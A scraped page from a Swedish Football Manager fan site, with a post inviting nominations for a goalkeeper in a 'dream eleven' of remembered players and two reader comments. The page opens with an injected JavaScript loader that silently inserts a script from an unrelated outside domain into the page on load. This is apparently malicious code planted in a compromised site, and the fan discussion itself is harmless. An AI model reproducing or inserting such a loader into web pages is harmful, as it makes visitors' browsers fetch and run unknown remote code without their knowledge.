;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lirare vi minns: Drömelvan – Målvakt – FMSweden
Meny Stäng

Lirare vi minns: Drömelvan – Målvakt

Det är dags att ta ut en drömelva på lirare vi minns från tidiga upplagor. Det kan antingen vara spelare som varit outstanding överlag eller gömda guldkorn som varit bra för just er. Vilken upplaga av spelet spelar ingen roll. Ni nominerar spelare för varje position, jag läser på om spelarna, värderar hur många som tycker om samma spelare och sen tar jag ut vinnaren. Tillslut har vi en drömelva av lirare vi minns.

Först ut är målvakt. En position som jag hade svårt att komma på spelare själv från minnet. Mina starkaste kandidater är Stipe Pletikosa som var trevlig att köpa från Hajduk Split, Igor Akinfeev som länge var ruggigt bra i sina värden samt Pedrag Rajkovic som var fin att få in från Maccabia Haifa.

Vilka målvakter nominerar ni?

Please wait...

Liknande Inlägg

13 kommentarer

  1. Imonsh

    Akinfeev som du skriver är min givna kandidat tillsammans med Sébastien Frey. Vill även slå ett litet slag för Mickaël Landreau som alltid var en bra värvning. Frey och Landreau var väl bra på CM-tiden, medans Akinfeev är något mer närmare i tid.

  2. Micke

    Alex Smithies, tror han var i Huddersfield på FM11. Gick att köpa billigt och hade fin potential. Manuel Almunia, ungefär samma spel. Gick att övertala honom att spela för Englands landslag som jag spelade med en del och då var han ordinarie direkt.

Lämna ett svar